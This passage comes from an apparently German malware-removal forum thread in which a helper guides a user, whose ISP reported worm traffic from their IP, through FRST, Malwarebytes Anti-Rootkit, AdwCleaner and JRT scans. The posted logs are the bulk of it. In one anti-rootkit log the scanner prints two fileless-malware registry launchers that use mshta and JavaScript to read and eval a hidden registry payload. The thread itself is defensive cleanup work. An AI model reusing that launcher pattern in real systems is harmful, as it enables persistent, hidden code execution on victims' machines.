ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">. Error: (08/06/2017 12:22:46 AM) (Source: Windows Search Service) (EventID: 1019) (User: ) Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">. Error: (08/06/2017 12:22:31 AM) (Source: Windows Search Service) (EventID: 1019) (User: ) Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">. Systemfehler: ============= Error: (08/06/2017 01:13:53 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "Digital Wave Update Service" wurde aufgrund folgenden Fehlers nicht gestartet: Das System kann die angegebene Datei nicht finden. 
Error: (08/06/2017 01:11:46 AM) (Source: NETLOGON) (EventID: 3095) (User: ) Description: Dieser Computer ist als Mitglied einer Arbeitsgruppe konfiguriert, nicht als Mitglied einer Domäne. Der Anmeldedienst braucht bei dieser Konfiguration nicht gestartet zu sein. Error: (08/06/2017 01:11:46 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet: Die Anforderung wird nicht unterstützt. Error: (08/06/2017 01:08:38 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "Digital Wave Update Service" wurde aufgrund folgenden Fehlers nicht gestartet: Das System kann die angegebene Datei nicht finden. Error: (08/06/2017 01:06:31 AM) (Source: NETLOGON) (EventID: 3095) (User: ) Description: Dieser Computer ist als Mitglied einer Arbeitsgruppe konfiguriert, nicht als Mitglied einer Domäne. Der Anmeldedienst braucht bei dieser Konfiguration nicht gestartet zu sein. Error: (08/06/2017 01:06:30 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet: Die Anforderung wird nicht unterstützt. Error: (08/06/2017 01:05:37 AM) (Source: DCOM) (EventID: 10010) (User: SILENTDRAGON) Description: Der Server "{D7FD466D-F6CF-4C8E-86DD-12E9B0FDAE48}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden. Error: (08/06/2017 01:05:37 AM) (Source: DCOM) (EventID: 10010) (User: SILENTDRAGON) Description: Der Server "{D7FD466D-F6CF-4C8E-86DD-12E9B0FDAE48}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden. Error: (08/06/2017 01:05:37 AM) (Source: DCOM) (EventID: 10010) (User: SILENTDRAGON) Description: Der Server "{D7FD466D-F6CF-4C8E-86DD-12E9B0FDAE48}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden. 
Error: (08/06/2017 01:05:37 AM) (Source: DCOM) (EventID: 10010) (User: SILENTDRAGON) Description: Der Server "{D7FD466D-F6CF-4C8E-86DD-12E9B0FDAE48}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden. CodeIntegrity: =================================== Date: 2017-07-28 18:15:03.249 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. Date: 2017-07-28 18:15:02.562 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. Date: 2017-07-05 21:28:31.069 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. Date: 2017-05-20 13:12:31.840 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. Date: 2017-05-06 20:55:49.642 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. 
Date: 2017-04-20 20:43:22.953 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. Date: 2017-04-20 20:06:11.606 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. Date: 2017-04-19 20:40:43.841 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. Date: 2017-04-19 20:18:44.959 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. 
==================== Speicherinformationen =========================== Prozessor: Intel(R) Core(TM) i7-5820K CPU @ 3.30GHz Prozentuale Nutzung des RAM: 19% Installierter physikalischer RAM: 16279.21 MB Verfügbarer physikalischer RAM: 13164 MB Summe virtueller Speicher: 18711.21 MB Verfügbarer virtueller Speicher: 15354.91 MB ==================== Laufwerke ================================ Drive c: () (Fixed) (Total:237.69 GB) (Free:70.63 GB) NTFS Drive f: (Volume) (Fixed) (Total:3725.96 GB) (Free:3666.44 GB) NTFS Drive g: (Volume) (Fixed) (Total:3725.96 GB) (Free:2787.95 GB) NTFS ==================== MBR & Partitionstabelle ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 238.5 GB) (Disk ID: BE291492) Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=237.7 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=449 MB) - (Type=27) ======================================================== Disk: 1 (MBR Code: Windows 7 or 8) (Size: 7452 GB) (Disk ID: 00000000) Partition: GPT. ==================== Ende von Addition.txt ============================ |
07.08.2017, 10:47 | #20 |
/// Winkelfunktion /// TB-Süch-Tiger™ | UPC reports: virus, worms are being sent via my IP
Malwarebytes Anti-Rootkit (MBAR)
Please download Malwarebytes Anti-Rootkit and save it to your desktop.
Do not start any other file in this folder without instructions from a helper.
Reading material: Posting in CODE tags
Attaching the log files, or even packing them into a ZIP, RAR or 7Z archive beforehand, makes my work massively harder. Even if the logs are too large for one post, please post them directly, spread over several posts if necessary. To put the log files into a CODE box, proceed as follows:
__________________ Please always post log files in CODE tags |
07.08.2017, 18:57 | #21 |
| UPC reports: virus, worms are being sent via my IP It didn't like something in the registry... Code:
Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
main: v2017.08.07.08
rootkit: v2017.08.02.01

Windows 10 x64 NTFS
Internet Explorer 11.483.15063.0
**** :: SILENTDRAGON [administrator]

07.08.2017 19:29:32
mbar-log-2017-08-07 (19-29-32).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 302574
Time elapsed: 10 minute(s), 8 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 2
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\QOFQOW\SHELL\OPEN\COMMAND (Rootkit.Fileless.MTGen) -> Delete on reboot. [92f2f09a06a34aece13457cd59a8be42]
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\5B53A\SHELL\OPEN\COMMAND (Rootkit.Fileless.MTGen) -> Delete on reboot. [83012a602b7e1f1727684cdefb06b34d]

Registry Values Detected: 2
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\qofqow\SHELL\OPEN\COMMAND| (Rootkit.Fileless.MTGen) -> Data: "C:\WINDOWS\system32\mshta.exe" "javascript:qCMtl0iJ="KTSd4";Zc0=new ActiveXObject("WScript.Shell");PaNndH09="ye7m06u";uOK7n=Zc0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");fbZu1="pzwHtm";eval(uOK7n);CXc9F7L="bpC";" -> Delete on reboot. [92f2f09a06a34aece13457cd59a8be42]
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\5b53a\SHELL\OPEN\COMMAND| (Rootkit.Fileless.MTGen) -> Data: "C:\WINDOWS\system32\mshta.exe" "javascript:S5lrz="f310qYGw";Vo0=new ActiveXObject("WScript.Shell");ou8rBoG="TXQ";EKfm37=Vo0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");EFQEQ1s="B1036niD";eval(EKfm37);phzPz7y7="m";" -> Delete on reboot. [83012a602b7e1f1727684cdefb06b34d]

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

Physical Sectors Detected: 0
(No malicious items detected)

(end)

Code:
Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
main: v2017.08.07.08
rootkit: v2017.08.02.01

Windows 10 x64 NTFS
Internet Explorer 11.483.15063.0
***** :: SILENTDRAGON [administrator]

07.08.2017 19:45:23
mbar-log-2017-08-07 (19-45-23).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 301793
Time elapsed: 8 minute(s), 10 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

Physical Sectors Detected: 0
(No malicious items detected)

(end) |
07.08.2017, 21:41 | #22 |
/// Winkelfunktion /// TB-Süch-Tiger™ | UPC reports: virus, worms are being sent via my IP
Remove adware/junkware/toolbars
Delete old versions of adwCleaner and, if present, JRT first, then download them again to the desktop! Please completely disable your virus scanner now before using these tools!
Step 1: adwCleaner v7.0.1.0
Please download AdwCleaner to your desktop (illustrated guide).
Step 2: JRT - Junkware Removal Tool
Please shut down your security software to avoid possible conflicts.
__________________ Please always post log files in CODE tags |
07.08.2017, 23:00 | #23 |
| adwcleaner_7.0.1.0 SCAN Code:
# AdwCleaner 7.0.1.0 - Logfile created on Mon Aug 07 21:51:40 2017
# Updated on 2017/05/08 by Malwarebytes
# Running on Windows 10 Home (X64)
# Mode: clean
# Support: https://www.malwarebytes.com/support

***** [ Services ] *****

No malicious services deleted.

***** [ Folders ] *****

Deleted: C:\Windows\System32\config\systemprofile\AppData\Roaming\IObit\Advanced SystemCare
Deleted: C:\Program Files (x86)\Common Files\IObit\Advanced SystemCare
Deleted: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\IObit\Advanced SystemCare
Deleted: C:\Users\*****\AppData\LocalLow\IObit\Advanced SystemCare
Deleted: C:\Users\*****\AppData\Roaming\IObit\Advanced SystemCare
Deleted: C:\Users\*****\AppData\Local\YSearchUtil
Deleted: C:\ProgramData\IObit\ASCDownloader
Deleted: C:\Users\All Users\IObit\ASCDownloader
Deleted: C:\ProgramData\GPCWValidator
Deleted: C:\Users\All Users\GPCWValidator
Deleted: C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
Deleted: C:\ProgramData\{74E9F814-C737-42CC-B721-DBBC4059367A}
Deleted: C:\ProgramData\{BE2ACE5C-32B7-4777-9BDF-ECF87CDAB705}
Deleted: C:\ProgramData\{EAAB5A83-3809-4B0E-83A6-E4B0DBF2157E}
Deleted: C:\ProgramData\{FD6F83C0-EC70-4581-8361-C70CD1AA4B98}

***** [ Files ] *****

Deleted: C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
Deleted: C:\Users\All Users\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
Deleted: C:\Windows\System32\lavasofttcpservice.dll
Deleted: C:\Windows\SysWOW64\lavasofttcpservice.dll
Deleted: C:\Windows\SysNative\LavasoftTcpService64.dll
Deleted: C:\Windows\Reimage.ini

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks deleted.

***** [ Registry ] *****

Deleted: [Key] - HKLM\SOFTWARE\IOBIT\ASC
Deleted: [Key] - HKLM\SOFTWARE\ussc-pr
Deleted: [Key] - HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{10ECCE17-29B5-4880-A8F5-EAD298611484}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{9BB31AD8-5DB2-459E-A901-DEA536F23BA4}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{BD51A48E-EB5F-4454-8774-EF962DF64546}
Deleted: [Key] - HKLM\SOFTWARE\Classes\TypeLib\{FA6468D2-FAA4-4951-A53B-2A5CF9CC0A36}
Deleted: [Key] - HKLM\SOFTWARE\Classes\AppID\{28FF42B8-A0DA-4BE5-9B81-E26DD59B350A}
Deleted: [Value] - HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|Advanced SystemCare 10
Deleted: [Key] - HKLM\SOFTWARE\Classes\AppID\REI_AxControl.DLL
Deleted: [Key] - HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Local AppWizard-Generated Applications\Reimage - Windows Problem Relief.
Deleted: [Key] - HKCU\Software\Local AppWizard-Generated Applications\Reimage - Windows Problem Relief.
Deleted: [Key] - HKLM\SOFTWARE\Reimage
Deleted: [Key] - HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Reimage
Deleted: [Key] - HKCU\Software\Reimage
Deleted: [Key] - HKLM\SOFTWARE\Auslogics

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries deleted.

***** [ Chromium (and derivatives) ] *****

Plugin deleted: MSN Homepage & Bing Search Engine -

*************************

::Tracing keys deleted
::Winsock settings cleared
::Prefetch files deleted
::Proxy settings cleared
::IE policies deleted
::Chrome policies deleted
::Additional Actions: 0

*************************

C:/AdwCleaner/AdwCleaner[C1].txt - [7019 B] - [2015/11/3 1:16:48]
C:/AdwCleaner/AdwCleaner[S1].txt - [4242 B] - [2015/11/3 1:16:24]

########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt ##########

Code:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.4 (07.09.2017)
Operating System: Windows 10 Home x64
Ran by **** (Administrator) on 07.08.2017 at 23:57:46,77
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

File System: 10

Successfully deleted: C:\ProgramData\pdfforge (Folder)
Successfully deleted: C:\ProgramData\productdata (Folder)
Successfully deleted: C:\Users\****\AppData\Roaming\productdata (Folder)
Successfully deleted: C:\WINDOWS\system32\Tasks\Driver Booster SkipUAC (****) (Task)
Successfully deleted: C:\WINDOWS\system32\Tasks\StartMenu8_Start (Task)
Successfully deleted: C:\WINDOWS\system32\Tasks\Uninstaller_Install_Martin_W (Task)
Successfully deleted: C:\WINDOWS\system32\Tasks\Uninstaller_SkipUac_Martin_W (Task)
Successfully deleted: C:\WINDOWS\Tasks\StartMenu8_Start.job (Task)
Successfully deleted: C:\WINDOWS\Tasks\Uninstaller_Install_Martin_W.job (Task)
Successfully deleted: C:\WINDOWS\Tasks\Uninstaller_SkipUac_Martin_W.job (Task)

Registry: 1

Successfully deleted: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} (Registry Key)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 07.08.2017 at 23:58:47,94
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |
07.08.2017, 23:09 | #24 |
/// Winkelfunktion /// TB-Süch-Tiger™ | UPC reports: virus, worms are being sent via my IP Okay, please run both tools again as a check.
__________________ Please always post log files in CODE tags |
08.08.2017, 17:03 | #25 |
| UPC reports: virus, worms are being sent via my IP OK, here is adwcleaner again Code:
# AdwCleaner 7.0.1.0 - Logfile created on Tue Aug 08 15:59:40 2017
# Updated on 2017/05/08 by Malwarebytes
# Running on Windows 10 Home (X64)
# Mode: clean
# Support: https://www.malwarebytes.com/support

***** [ Services ] *****

No malicious services deleted.

***** [ Folders ] *****

No malicious folders deleted.

***** [ Files ] *****

No malicious files deleted.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks deleted.

***** [ Registry ] *****

No malicious registry entries deleted.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries deleted.

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries deleted.

*************************

::Tracing keys deleted
::Winsock settings cleared
::Prefetch files deleted
::Proxy settings cleared
::IE policies deleted
::Chrome policies deleted
::Additional Actions: 0

*************************

C:/AdwCleaner/AdwCleaner[C1].txt - [1456 B] - [2015/11/3 1:16:48]
C:/AdwCleaner/AdwCleaner[S1].txt - [1079 B] - [2015/11/3 1:16:24]

########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt ##########

Code:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.4 (07.09.2017)
Operating System: Windows 10 Home x64
Ran by Martin W*** (Administrator) on 08.08.2017 at 18:04:00,30
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

File System: 1

Successfully deleted: C:\ProgramData\productdata (Folder)

Registry: 0

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 08.08.2017 at 18:05:00,48
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Code:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.4 (07.09.2017)
Operating System: Windows 10 Home x64
Ran by Martin W*** (Administrator) on 08.08.2017 at 18:08:32,26
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

File System: 0

Registry: 0

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 08.08.2017 at 18:09:26,98
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Edited by Lost_Viking (08.08.2017 at 17:12) |
08.08.2017, 22:02 | #26 |
/// Winkelfunktion /// TB-Süch-Tiger™ | UPC reports: virus, worms are being sent via my IP I need new FRST logs. Tick the box for addition.txt, then click "Untersuchen" (Scan).
__________________ Please always post log files in CODE tags |
09.08.2017, 18:06 | #27 |
| FRST Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 09-08-2017 durchgeführt von *** (Administrator) auf SILENTDRAGON (09-08-2017 18:59:08) Gestartet von C:\Users\***\Desktop Geladene Profile: *** (Verfügbare Profile: ***) Platform: Windows 7 Ultimate (X64) Sprache: Deutsch (Deutschland) Internet Explorer Version 11 (Standard-Browser: Chrome) Start-Modus: Normal Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Prozesse (Nicht auf der Ausnahmeliste) ================= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.) (Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe (Microsoft Corporation) C:\Program Files\Microsoft LifeCam\MSCamS64.exe (Electronic Arts) G:\Program Files (x86)\Origin\OriginWebHelperService.exe (Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkypeHost.exe (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler.exe (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler64.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe (Samsung Electronics Co., Ltd.) C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe (Qualcomm Atheros) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe (Logitech Inc.) 
C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe (Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe (Qualcomm Atheros) C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe (IObit) C:\Program Files (x86)\IObit\Classic Start\SMService.exe (DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe (IObit) C:\Program Files (x86)\IObit\Classic Start\InstallServices.exe (Microsoft Corporation) C:\Windows\System32\smartscreen.exe (Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.15063.410_none_9e914f9d2d85dacb\TiWorker.exe (Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe (Skype Technologies) C:\Program Files (x86)\Skype\Browser\SkypeBrowserHost.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe ==================== Registry (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.) HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9197568 2017-05-15] (Realtek Semiconductor) HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2014-05-28] (Intel Corporation) HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3113592 2015-08-26] (Logitech, Inc.) 
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [17406072 2017-01-24] (Logitech Inc.) HKLM-x32\...\Run: [LWS] => C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe [204136 2012-09-13] (Logitech Inc.) HKLM-x32\...\Run: [KiesTrayAgent] => C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe [318128 2016-11-16] (Samsung Electronics Co., Ltd.) HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2017-07-21] (Oracle Corporation) Winlogon\Notify\LBTWlgn: c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll (Logitech, Inc.) HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9818328 2017-06-30] (Piriform Ltd) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [MyDriveConnect.exe] => C:\Program Files (x86)\MyDrive Connect\TomTom MyDrive Connect.exe [1986280 2017-07-07] (TomTom) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Steam] => G:\Program Files (x86)\Steam\steam.exe [3062560 2017-07-18] (Valve Corporation) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Google Update] => C:\Users\***\AppData\Local\Google\Update\1.3.33.5\GoogleUpdateCore.exe [601168 2017-04-27] (Google Inc.) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [BingSvc] => C:\Users\***\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-05] (© 2015 Microsoft Corporation) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Dropbox Update] => C:\Users\***\AppData\Local\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-05] (Dropbox, Inc.) 
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [World of Warships] => G:\Games\World_of_Warships\WargamingGameUpdater.exe [3136264 2017-06-02] (Wargaming.net) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Akamai NetSession Interface] => C:\Users\***\AppData\Local\Akamai\netsession_win.exe [4490200 2017-01-03] (Akamai Technologies, Inc.) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Google Photos Backup] => C:\Users\***\AppData\Local\Programs\Google\Google Photos Backup\Google Photos Backup.exe [3790936 2016-04-09] (Google, Inc) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Run: [Spotify Web Helper] => C:\Users\***\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-04-19] (Spotify Ltd) HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 ==================== Internet (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.) 
Tcpip\Parameters: [DhcpNameServer] 62.2.24.162 62.2.17.61 62.2.24.158 62.2.17.60 Tcpip\..\Interfaces\{f81baef3-2886-44c5-9a55-1cfe2ed39eeb}: [DhcpNameServer] 62.2.24.162 62.2.17.61 62.2.24.158 62.2.17.60 ManualProxies: Internet Explorer: ================== HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <==== ACHTUNG HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#web/result?source=art&q= HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/ HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.ch/ BHO: Kein Name -> {AF949550-9094-4807-95EC-D1C317803333} -> Keine Datei BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\ssv.dll [2017-08-06] (Oracle Corporation) BHO-x32: Java(tm) Plug-In 2 SSV Helper -> 